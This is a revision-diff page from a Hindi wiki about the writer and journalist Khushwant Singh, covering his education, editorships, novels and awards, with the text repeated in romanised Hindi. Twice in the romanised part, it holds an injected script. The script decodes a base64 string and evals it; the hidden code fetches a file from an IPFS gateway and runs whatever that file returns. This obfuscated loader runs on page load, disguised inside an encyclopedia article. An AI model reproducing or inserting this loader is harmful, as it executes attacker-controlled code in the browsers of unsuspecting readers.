Difference between revisions of "खुशवंत सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "कानून" to "क़ानून")
Line 3: Line 3:
 
खुशवंत सिंह एक प्रसिद्ध पत्रकार, लेखक , उपन्यासकार और इतिहासकार हैं।  
 
खुशवंत सिंह एक प्रसिद्ध पत्रकार, लेखक , उपन्यासकार और इतिहासकार हैं।  
 
==जन्म और शिक्षा==  
 
==जन्म और शिक्षा==  
खुशवंत सिंह का जन्म 1915 ई. में [[पंजाब]] के हदाली नामक स्थान (अब [[पाकिस्तान]] में) में हुआ था। उन्होंने गवर्नमेंट कॉलेज, लाहौर और कैम्ब्रिज यूनिवर्सिटी में शिक्षा पाई तथा [[लंदन]] से ही कानून की डिग्री ली। उसके बाद तक [[लाहौर]] में वकालत करते रहे।  
+
खुशवंत सिंह का जन्म 1915 ई. में [[पंजाब]] के हदाली नामक स्थान (अब [[पाकिस्तान]] में) में हुआ था। उन्होंने गवर्नमेंट कॉलेज, लाहौर और कैम्ब्रिज यूनिवर्सिटी में शिक्षा पाई तथा [[लंदन]] से ही क़ानून की डिग्री ली। उसके बाद तक [[लाहौर]] में वकालत करते रहे।  
 
==पत्रकार के रूप में==
 
==पत्रकार के रूप में==
 
खुशवंत सिंह प्रसिद्ध पत्रकार हैं और इस क्षेत्र में उन्होंने बहुत ख्याति अर्जित की। 1951 में वे आकाशवाणी से संबद्ध थे और 1951 से 1953 तक भारत सरकार के  पत्र 'योजना' का संपादन किया। [[मुंबई]] से प्रकाशित प्रसिद्ध अग्रेज़ी साप्ताहिक 'इल्लस्ट्रेटेड वीकली ऑफ़ इंडिया' के और 'न्यू डेल्ही' के संपादक वे 1980 तक थे। 1983 तक [[दिल्ली]] के प्रमुख अंग्रेज़ी दैनिक 'हिन्दुस्तान टाइम्स' के संपादक भी वही थी। तभी से वे प्रति सप्ताह एक लोकप्रिय 'कॉलम' लिखते हैं जो अनेक भाषाओं के दैनिक पत्रों में प्रकाशित होता है।
 
खुशवंत सिंह प्रसिद्ध पत्रकार हैं और इस क्षेत्र में उन्होंने बहुत ख्याति अर्जित की। 1951 में वे आकाशवाणी से संबद्ध थे और 1951 से 1953 तक भारत सरकार के  पत्र 'योजना' का संपादन किया। [[मुंबई]] से प्रकाशित प्रसिद्ध अग्रेज़ी साप्ताहिक 'इल्लस्ट्रेटेड वीकली ऑफ़ इंडिया' के और 'न्यू डेल्ही' के संपादक वे 1980 तक थे। 1983 तक [[दिल्ली]] के प्रमुख अंग्रेज़ी दैनिक 'हिन्दुस्तान टाइम्स' के संपादक भी वही थी। तभी से वे प्रति सप्ताह एक लोकप्रिय 'कॉलम' लिखते हैं जो अनेक भाषाओं के दैनिक पत्रों में प्रकाशित होता है।

Revision as of 11:49, 20 December 2011

thumb|khushavant sianh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

khushavant sianh ek prasiddh patrakar, lekhak , upanyasakar aur itihasakar haian.

janm aur shiksha

khushavant sianh ka janm 1915 ee. mean panjab ke hadali namak sthan (ab pakistan mean) mean hua tha. unhoanne gavarnameant k aaulej, lahaur aur kaimbrij yoonivarsiti mean shiksha paee tatha landan se hi qanoon ki digri li. usake bad tak lahaur mean vakalat karate rahe.

patrakar ke roop mean

khushavant sianh prasiddh patrakar haian aur is kshetr mean unhoanne bahut khyati arjit ki. 1951 mean ve akashavani se sanbaddh the aur 1951 se 1953 tak bharat sarakar ke patr 'yojana' ka sanpadan kiya. muanbee se prakashit prasiddh agrezi saptahik 'illastreted vikali aauf iandiya' ke aur 'nyoo delhi' ke sanpadak ve 1980 tak the. 1983 tak dilli ke pramukh aangrezi dainik 'hindustan taims' ke sanpadak bhi vahi thi. tabhi se ve prati saptah ek lokapriy 'k aaulam' likhate haian jo anek bhashaoan ke dainik patroan mean prakashit hota hai.

prasiddh upanyasakar

khushavant sianh upanyasakar, itihasakar aur rajanitik vishleshak ke roop mean vikhyat haian. unake anek upanyasoan mean prasiddh haian- 'delhi', 'tren tu pakistan', 'di kanpani aauf vooman' adi. vartaman sandarbhoan tatha prakritik vatavaran par bhi unaki kee rachanaean haian. do khandoan mean prakashit sikkhoan ka itihas unaki prasiddh aitihasik kriti hai. sahity ke kshetr mean pichhale sattar varsh mean khushavant sianh ka vividh ayami yogadan atyant mahatvapoorn hai.

pad

1947 se kuchh varshoan tak unhoanne bharat ke videsh mantralay mean videsh seva ke mahattvapoorn padoan par rahe. 1980 se 1986 tak ve rajy sabha ke manonit sadasy rahe.

puraskar

khushavant sianh ko anek puraskar mile haian. 2000 ee. mean unako 'varsh ka eemanadar vyakti' samman mila tha. 1974 mean rashtrapati ne unhean 'padm bhooshan' ke alankaran se sammanit kiya jo amritasar ke svarn mandir mean kendr sarakar ki karravaee ke virodh mean unhoanne 1984 mean lauta diya tha. 2007 mean inhean 'padm vibhooshan' se bhi sammanit kiya gaya hai. unaka lekhan kary ab bhi jari hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh